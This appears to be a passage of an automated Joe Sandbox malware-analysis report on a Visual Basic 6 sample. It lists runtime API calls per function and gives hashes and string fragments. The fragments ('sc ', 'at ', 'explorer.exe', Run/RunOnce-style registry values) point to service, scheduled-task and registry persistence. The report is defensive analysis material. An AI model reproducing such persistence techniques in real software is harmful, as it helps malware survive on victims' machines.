                                                                                      • Part of subcall function 0041F150: __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F218
                                                                                      • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F238
                                                                                      • Part of subcall function 0041F150: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
                                                                                      • Part of subcall function 0041F150: #616.MSVBVM60(?,-00000001), ref: 0041F251
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F25C
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F265
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0041ECBB
                                                                                    • __vbaStrCmp.MSVBVM60(00408114,?), ref: 0041ECD1
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00409A70,?), ref: 0041ECF1
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041ECFC
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 0041ED03
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041ED1E
                                                                                    • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041ED43
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041ED4E
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041ED5C
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041ED7B
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041ED8A
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041ED96
                                                                                    • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041EDAC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EDB7
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EDC5
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041EDE4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041EDF3
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041EDFF
                                                                                      • Part of subcall function 0041A980: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
                                                                                      • Part of subcall function 0041A980: __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
                                                                                      • Part of subcall function 0041A980: __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
                                                                                      • Part of subcall function 0041A980: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
                                                                                      • Part of subcall function 0041A980: __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
                                                                                      • Part of subcall function 0041A980: __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
                                                                                      • Part of subcall function 0041A980: #525.MSVBVM60(00000104), ref: 0041AA9C
                                                                                      • Part of subcall function 0041A980: __vbaStrMove.MSVBVM60 ref: 0041AAA7
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
                                                                                      • Part of subcall function 0041A980: __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
                                                                                    • __vbaSetSystemError.MSVBVM60(00000014,00000000), ref: 0041EE2B
                                                                                    • #598.MSVBVM60 ref: 0041EE38
                                                                                    • #611.MSVBVM60(00000000), ref: 0041EE47
                                                                                    • #661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0041EE77
                                                                                    • #705.MSVBVM60(?,00000004), ref: 0041EE86
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EE94
                                                                                    • __vbaStrCat.MSVBVM60(?,at ), ref: 0041EEB9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEC4
                                                                                    • __vbaStrCat.MSVBVM60(004086A8,00000000), ref: 0041EED0
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEDB
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041EEEB
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041EEF2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEFD
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF0A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF15
                                                                                    • __vbaStrCat.MSVBVM60("\\,00000000), ref: 0041EF21
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF2C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF3A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF45
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF51
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF5C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF6A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF78
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF84
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF92
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF9F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EFAD
                                                                                    • __vbaStrCat.MSVBVM60(004095E4,00000000), ref: 0041EFB9
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041EFD8
                                                                                    • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F022
                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041F042
                                                                                    • __vbaOnError.MSVBVM60(000000FF), ref: 0041F076
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F099
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041F0AF
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0041F0B5
                                                                                    • __vbaFreeStr.MSVBVM60(0041F135), ref: 0041F12E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Ansi$#600Chkstk$#537List$#525#598#606#611#616#661#705Construct2CopyExitProcUnicode
                                                                                    • String ID: "\\$at $sc
                                                                                    • API String ID: 318166071-2414866108
                                                                                    • Opcode ID: 4b8c8b84d047fe4784aaf450267804eaefad0624f37f806294de8aa0bbb905cd
                                                                                    • Instruction ID: eba9ca47820d788d97438d3d91098e027868d298501ab0f7648888b7b33149ee
                                                                                    • Opcode Fuzzy Hash: 4b8c8b84d047fe4784aaf450267804eaefad0624f37f806294de8aa0bbb905cd
                                                                                    • Instruction Fuzzy Hash: 01F12E71900248EFDB14DFA0DE49BDEBBB4FB48305F1081AAE506B72A0DB745A89CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040F89E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040F8E5
                                                                                      • Part of subcall function 00429F50: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
                                                                                      • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
                                                                                      • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
                                                                                      • Part of subcall function 00429F50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
                                                                                      • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
                                                                                      • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
                                                                                      • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
                                                                                      • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000,80000002,00000000,Start,00000004,80000002,00000000,Start,00000002,80000001,00000000,00000000,00000000), ref: 0040F95B
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0040F966
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0040F980
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0040F98B
                                                                                      • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                      • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                      • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                      • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,Function_000032B6), ref: 0040F9A6
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,Function_000032B6), ref: 0040F9C2
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040F9CD
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,Function_000032B6), ref: 0040F9E6
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040F9F1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,Function_000032B6), ref: 0040FA0C
                                                                                      • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                      • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                      • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                      • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                      • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                      • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                      • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                      • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                      • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                      • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                      • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                      • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040FA7B
                                                                                    • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040FAA3
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040FAAE
                                                                                    • __vbaFreeStr.MSVBVM60(00000000), ref: 0040FABD
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004077C4), ref: 0040FAD1
                                                                                    • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040FADC
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040FB0F
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040FB2A
                                                                                    • __vbaNew.MSVBVM60(004075DC), ref: 0040FB3C
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB47
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040FB7A
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040FB95
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040FBC0
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040FBDA
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040FBE1
                                                                                    • #529.MSVBVM60(00000008), ref: 0040FBF5
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Copy$Error$ChkstkSystem$AnsiBstrUnicode$List$File$#525#529#570#580#648CheckHresultOpen$#616CastGet3Get4Seek
                                                                                    • String ID: $ MR$ RO$O$Once$Start$at
                                                                                    • API String ID: 3212910503-2307593978
                                                                                    • Opcode ID: d7c645850be29222d1b7267b5b78ad533bfe0a9cf40cb1f2a83c7e80c5fd35d6
                                                                                    • Instruction ID: 65a71e158419679981a83cfad656d767fba14ec0aa04879cc95e73d8581266b7
                                                                                    • Opcode Fuzzy Hash: d7c645850be29222d1b7267b5b78ad533bfe0a9cf40cb1f2a83c7e80c5fd35d6
                                                                                    • Instruction Fuzzy Hash: 8F020D75A00208EFDB14DFA0DE89BDE77B4FB48304F508169E505B72A1DB74AA45CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CB91,00000000), ref: 0042984E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042987B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042988A
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,00000000,004032B6), ref: 004298A3
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 004298AE
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,?,00000000,004032B6), ref: 004298C7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 004298D2
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,000F003F,?,?,?,?,?,?,00000000,004032B6), ref: 004298F2
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,?,00000000,004032B6), ref: 00429906
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,00000000,004032B6), ref: 00429914
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042992C
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00429962
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000), ref: 00429973
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429981
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042998A
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 004299B3
                                                                                    • __vbaLenBstr.MSVBVM60(?), ref: 004299CA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 004299D9
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000001,00000000), ref: 004299EA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 004299F5
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00429A05
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429A13
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00429A2F
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A47
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,00000000,004032B6), ref: 00429A58
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A66
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429A6F
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A84
                                                                                    • __vbaSetSystemError.MSVBVM60(80000001,00000000,?,?,?,?,00000000,004032B6), ref: 00429A95
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429AA3
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429AAC
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0042999F
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00429ADB
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000), ref: 00429AEC
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429AFA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00429B03
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00429B18
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00429B2C
                                                                                    • __vbaLenBstr.MSVBVM60(?), ref: 00429B43
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 00429B52
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000001,00000000), ref: 00429B63
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00429B6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00429B7E
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429B8C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00429BA8
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429BC0
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,00000000,004032B6), ref: 00429BD1
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429BDF
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429BE8
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429C3B
                                                                                    • __vbaFreeStr.MSVBVM60(00429C84,?,?,?,?,00000000,004032B6), ref: 00429C6B
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429C74
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429C7D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
